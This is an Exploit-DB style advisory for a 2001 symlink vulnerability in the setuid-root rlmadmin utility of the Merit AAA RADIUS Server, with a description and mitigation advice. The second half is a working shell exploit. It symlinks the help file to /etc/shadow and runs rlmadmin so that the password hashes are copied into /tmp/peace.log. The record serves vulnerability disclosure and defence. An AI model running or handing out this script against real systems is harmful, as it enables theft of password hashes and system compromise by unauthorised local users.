rlmadmin view file symlink vulnerability

vendor:

rlmadmin

by:

Digital Shadow

7.2

CVSS

HIGH

Symbolic Link Attack

264

CWE

Product Name: rlmadmin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2001

rlmadmin view file symlink vulnerability

The 'rlmadmin' user management utility included with the Merit AAA RADIUS Server package is susceptible to a trivial symbolic link attack. The program allows users to specify a directory from which configuration files should be loaded at runtime. A help file, 'rlmadmin.help', is loaded from this directory and displayed directly to the user when the program is run. The vulnerability exists because the program is setuid root and does not check if the help file is symbolically linked before displaying its contents to the user. As a local user, it is trivial for a local user to read any file on the system. This may lead to the disclosure of sensitive data and system compromise.

Mitigation:

Ensure that the program is not setuid root and that it checks if the help file is symbolically linked before displaying its contents to the user.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3302/info


The 'rlmadmin' user management utility included with the Merit AAA RADIUS Server package is susceptible to a trivial symbolic link attack. The program allows users to specify a directory from which configuration files should be loaded at runtime. A help file, 'rlmadmin.help', is loaded from this directory and displayed directly to the user when the program is run.

The vulnerability exists because the program is setuid root and does not check if the help file is symbolically linked before displaying its contents to the user. As a local user, it is trivial for a local user to read any file on the system. This may lead to the disclosure of sensitive data and system compromise. 

#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability #
# (c)oded 2001 Digital Shadow #
# www.ministryofpeace.co.uk #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
bloc=/usr/private/etc # executable file location
cloc=/usr/private/etc/raddb # config file location
file=/etc/shadow # file to read
echo == rlmadmin exploit - visit www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log!